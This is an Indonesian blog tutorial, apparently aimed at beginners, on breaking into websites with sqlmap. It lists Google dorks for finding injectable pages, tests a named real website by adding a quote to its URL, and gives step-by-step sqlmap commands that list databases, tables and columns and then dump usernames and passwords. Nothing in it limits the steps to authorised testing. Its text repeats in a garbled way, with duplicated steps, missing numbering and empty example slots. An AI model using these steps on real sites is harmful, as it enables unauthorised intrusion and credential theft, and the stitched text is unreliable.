Tutorial sql injection menggunakan sqlmap di kali linux dan windows
assalamualaikum...........
ohhya sebelum memulai saya kasih penjelasan dulunih apa itu sqlmap.
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
nahhh udah tau kan apa itu sqlmap :
kalau gitu langsung ke tkp aja,
alat tempur buat windows
python
sqlmap
TUTORIAL kedua file di atas :
1. install phyton seperti biasa, dan extrak sqlmap dan save ke drive C;
contoh :
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
3. setelah mendapatkan target masukan tanda ( ' ) pada akhir url misal http://www.woodbridgeparty.com/products.php?id=111 dan masukan tanda ( ' ) pada akhir url menjadi http://www.woodbridgeparty.com/products.php?id=111' nah jika websitenya retan terhadap sqli maka akan ada tulisan YOU HAVE AN ERROR SQL BLA BLA BLA :D
4. buka CMD dan masukan perintah
cd /sqlmap (enter)
sqlmap.py -u (url website vuln) --dbs ( enter )
tunggu sampai sqlmap mendapatkan informasi database website seperti berikut
contoh :
contoh :
ohhya sebelum memulai saya kasih penjelasan dulunih apa itu sqlmap.
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
nahhh udah tau kan apa itu sqlmap :
kalau gitu langsung ke tkp aja,
alat tempur buat windows
python
sqlmap
TUTORIAL kedua file di atas :
1. install phyton seperti biasa, dan extrak sqlmap dan save ke drive C;
contoh :
2. cari website yang vuln terhadap sqli, untuk mencarinya masukan dork berikut :
inurl:games.php?id= inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
4. buka CMD dan masukan perintah
cd /sqlmap (enter)
sqlmap.py -u (url website vuln) --dbs ( enter )
tunggu sampai sqlmap mendapatkan informasi database website seperti berikut
5. selanjutnya mencari tabel dari website, pada comand prompt masukan perintah
sqlmap.py -u (url website vuln) -D namadatabase --tables, dan tunggu sampai tabel muncul.contoh :
6. next, masukan perintah ini pada comand prompt :
sqlmap.py -u (url website vuln) -D namadatabase -T namatables --columnscontoh :
7.terakhir, masukan perintah ini :
sqlmap.py -u (url web vuln) -D namadataase -T namatabel -C namacolumns --dump
contoh :
8. setelah semua toturial di atas di ikut maka akan muncul username dan password seperti ini
untuk menjalankan sqlmap pada kali linux agan tinggal buka terminal dan ketik SQLMAP, perintahnya sama seperti tutorial diatas
SELESAI
Komentar
Posting Komentar